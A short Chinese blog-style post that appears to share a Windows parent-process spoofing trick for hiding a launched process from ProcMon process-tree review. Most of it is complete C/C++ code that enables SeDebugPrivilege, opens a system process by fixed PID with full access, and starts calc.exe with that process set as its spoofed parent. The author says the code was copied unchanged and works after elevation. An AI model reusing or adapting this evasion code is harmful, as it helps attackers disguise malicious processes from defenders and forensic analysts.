通常情况下,在进程特别多的情况下使用ProcMon抓行为的时候都只是简单的看一下该进程的进程树,不会去注意系统进程创建的进程,这里就有了一个想法,可不可以在创建的时候指定父进程,之后在网上找了份代码,也没改直接拿来测试下,发现在提权之后是可以指定父进程为session 0的进程
#include<windows.h>
#include<stdio.h>
BOOL EnableDebugPrivilege(){
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
return FALSE;
}
if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue)) {
CloseHandle(hToken);
return FALSE;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL)) {
CloseHandle(hToken);
return FALSE;
}
return TRUE;
}
int main(){
EnableDebugPrivilege();
CHAR* lpExePath = "calc.exe";
/* 根据进程名获取任意进程Id */
DWORD pid =512;
HANDLE handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
/* 创建启动信息结构体 */
STARTUPINFOEXA si;
/* 初始化结构体 */
ZeroMemory(&si, sizeof(si));
/* 设置结构体成员 */
si.StartupInfo.cb = sizeof(si);
SIZE_T lpsize = 0;
/* 用微软规定的特定的函数初始化结构体 */
InitializeProcThreadAttributeList(NULL, 1, 0, &lpsize);
/* 转换指针到正确类型 */
char * temp = new char[lpsize];
LPPROC_THREAD_ATTRIBUTE_LIST AttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)temp;
/* 真正为结构体初始化属性参数 */
InitializeProcThreadAttributeList(AttributeList, 1, 0, &lpsize);
/* 用已构造的属性结构体更新属性表 */
if (!UpdateProcThreadAttribute(AttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &handle, sizeof(HANDLE), NULL, NULL)){
printf("%s", "Fail to update attributes");
return 0;
}
si.lpAttributeList = AttributeList;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
//==========================================================
//=========================================================
CreateProcessAsUserA(NULL, 0, lpExePath, 0, 0, 0, EXTENDED_STARTUPINFO_PRESENT, 0, 0, (LPSTARTUPINFOA)&si, &pi);
DeleteProcThreadAttributeList(AttributeList);
delete temp;
return 0;
}
代码出至原始代码